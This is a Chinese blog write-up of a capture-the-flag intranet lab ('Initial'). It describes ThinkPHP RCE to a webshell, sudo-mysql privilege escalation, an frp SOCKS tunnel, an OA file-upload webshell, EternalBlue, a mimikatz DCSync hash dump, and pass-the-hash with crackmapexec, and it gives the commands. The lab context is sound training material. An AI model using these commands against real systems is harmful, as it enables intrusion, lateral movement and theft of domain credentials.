[春秋云境]Initial

最新推荐文章于 2024-09-09 15:31:39 发布
最新推荐文章于 2024-09-09 15:31:39 发布
阅读量368 收藏 11
点赞数 3
分类专栏: 春秋云境打靶 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73307794/article/details/140962166
版权

flag01

访问靶机后有如下

image.png

信息搜集

title图标一眼顶针tp,fscan扫出来是tp5.23 rce漏洞
cf9c46dea116d1908ad7185111994eb.png
image.png
写🐎然后蚁剑

蚁剑

image.png

无密码执行mysql

image.png
发现无密码执行mysql,利用这个执行命令
查找flag

sudo mysql -e '\! find / -name flag*'

然后直接cat flag

sudo mysql -e '\! cat /root/flag/flag01.txt'

拿到第一段flag

flag01: flag{60b53231-

继续信息搜集

flag02

image.png
发现内网网段,直接fscan
image.png

image.png
fscan之后发现信呼OA,尝试进行内网穿透

frp搭建

frpc.ini

[common]
server_addr = [服务器ip]
server_port = 7000

[socks5_to_2] 
type = tcp
remote_port = 10088
plugin = socks5

在客户机启动

./frpc -c frpc.ini

frps.ini

[common]

Bind_addr = 0.0.0.0

bind_port = 7000

在服务器启动

./frps -c frps.ini

socks5连接

[服务器ip]:[remote_port]
[服务器ip]:10088

在这里我使用了proxifier来代理到全局
image.png
然后同时使用
image.png
来到我的kali

信呼OA – 172.22.1.18

admin/admin123登录后进行文件上传
得到
image.png
然后直接蚁剑连接
连接上之后在C:/Users/Administrator/flag/flag02.txt发现flag,进行一个flag2的读取
image.png

flag03

永恒之蓝 – 172.22.1.21 -> 172.22.1.16

我们直接用proxychain4去启动msfconsole
然后丝滑小连招拿到蓝的meterpreter
通过dir C:/Users/Administrator发现这个机器上并没有flag,于是听晨曦✌说有可能是要pth去拿到DC那台机子的shell,所以flag3有可能在DC那里,然后直到这里我才发现flag02的提示说flag03在domain controller里
那我们直接抓哈希

load kiwi

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

image.png
这样我们就拿到了administrator的hash
之后我们直接使用kali中的

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "dir"

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image.png
这样我们就拿到了最后一部分flag
那么就到此为止啦

反思

其实按照自己的进度来说还是总体比较顺利,之前学域的时候顾着理论而没有注重实践,这个靶机的pth狠狠提醒了我一手

c-fault
关注
专栏目录
clock_initial.rar_clock_Initial
09-23
标题"clock_initial.rar_clock_Initial"表明这是一个关于初始化单片机时钟的项目,可能包含了设计一个电子钟的完整流程,包括硬件电路图和软件C代码。下面我们将深入探讨这个主题。 1. **单片机时钟基础**: ...
春秋云境Initial
龙狼刺的博客
07-15 2045
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2378
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
漏洞披露-信呼-OA
最新发布
无问社区的博客
09-09 789
泛微数字化运营管理平台OA为组织提供从“可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理”信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。建议升级到最新版本已修复。
春秋云境Initial WP
m0_62466350的博客
12-05 1216
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
春秋云境Initial-WP(附带详细代理过程)
weixin_63576152的博客
10-01 587
用Thinkphpgui查找漏洞(一开始因为工具版本问题,一直不能getshell,心疼我的小砂砾),得到木马网址和密码。flag02在C://Users/Administrator/flag/flag02.txt中。fscan扫描172.22.1.0/24,结果默认保存在同目录下的result.txt中。利用frp和proxifier代理,可以访问到172.22.1.18(frp代理过程。用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件。
春秋云镜-【仿真场景】Initial writeup
渗透测试研究中心
03-07 1284
开启靶机后是一个带着 ThinkPHP icon 的登陆界面,直接测试一下存在 5.0.23 RCE打一下,PHP-7.4.3 的环境,看一下 disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifco...
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 4085
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
MySQL:reading initial communication packet问题解决方法
09-11
网站访问出现如题错误,经过检查my.cnf,发现innodb_buffer_pool_size = 2048M 设置过大,调整为innodb_buffer_pool_size = 1024M即可,网上也有该问题的其他解决方法,但都不能解决我的问题
Initial
10-28
从提供的信息来看,我们有两个文件:Initial1.GIF和Initial.ttf。前者可能是展示这个字体样式的图像文件,后者则是一个TrueType字体文件。 TrueType是一种由Apple公司和Microsoft公司共同开发的字体技术,广泛应用...
initial-CV
03-21
标题“initial-CV”可能指的是一个初步的个人简历或求职信模板,这通常是一个用于展示个人技能、经验、教育背景和个人成就的文档。在IT行业中,这样的简历常常以HTML格式制作,以便在网络上传播和展示,同时也能体现...
信呼协同办公OA系统 v1.9.8
10-21
信呼协同办公OA系统是开源的一款办公系统,跨平台的系统,支持APP,pc网页版,pc客户端等。简介:1、让每个企业单位都有自己的工作系统。2、移动,免费开源工作系统,数据全部自己管理。3、自定义管理应用,模块数据,权限分配。4、单据快速提醒推送,重要通知任务及时提醒。5、即时信息沟通交流。6、更多的请到官网下载,包括APP,服务端,客户端等下载。信呼协同办公系统 v1.9.8 更新日志:日期:2019-09-231、完善系统安全性。2、系统优化等。3、APP完善会话管理功能。
initial.py
12-08
initial.py
信呼OA nickName SQL注入漏洞复现(XVE-2024-19304)
0xSec
08-03 838
信呼OAnickName 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
靶场练习--春秋云境-Certify
NoooEmotion的博客
01-28 1903
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
文件包含漏洞(一)
不秃头的程序Yang
06-29 1560
二、常见文件包含函数 三、代码分析 四、利用方法 五、本地文件包含 1、文件包含/etc/passwd 3.2 搭建测试环境 3.3 抓包测试 文件包含图片 包含日志文件getshell 包含环境变量getshell
信呼OA普通用户权限getshell方法
C20220511的博客
03-05 1205
目前网上能找到的信呼OA getshell的办法大多数是老版本或者是需要admin权限的,没有针对新版本进行getshell的思路。由于传递的参数值会被全部转化为小写字母(下一步的漏洞分析中会提到),导致我们不能在webshell中使用大写字母,所以并不能直接写一句话webshell。信呼OA是一款开源的OA系统,面向社会免费提供学习研究使用,采用PHP语言编写,搭建简单方便,在中小企业中具有较大的客户使用量。运行之后访问下面的链接,由于链接中涉及到多个特殊字符,如果不清楚应该如何转义的请复制下面的链接。
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
siu~
08-29 1496
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.
verilog initial
08-14
Verilog `initial` is a keyword used to define a block of code that will be executed once at the beginning of the simulation. It is commonly used to initialize variables and perform any necessary setup tasks before the main simulation starts. The `initial` block runs concurrently with other procedural blocks in the design. Here's an example of how `initial` is used in Verilog: ```verilog module Example; reg clk; reg [7:0] count; initial begin clk = 0; count = 0; #10; // wait for 10 time units while(count < 8) begin #5; // wait for 5 time units count = count + 1; end $finish; // end simulation end always begin #1; // wait for 1 time unit clk = ~clk; end endmodule ``` In this example, the `initial` block initializes the `clk` and `count` variables. It then waits for 10 time units before entering a loop that increments `count` by 1 every 5 time units. Once `count` reaches 8, the simulation is ended using the `$finish` system function. The `always` block toggles the `clk` signal every 1 time unit. Note that `initial` blocks are not synthesizable and are only used for simulation purposes.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值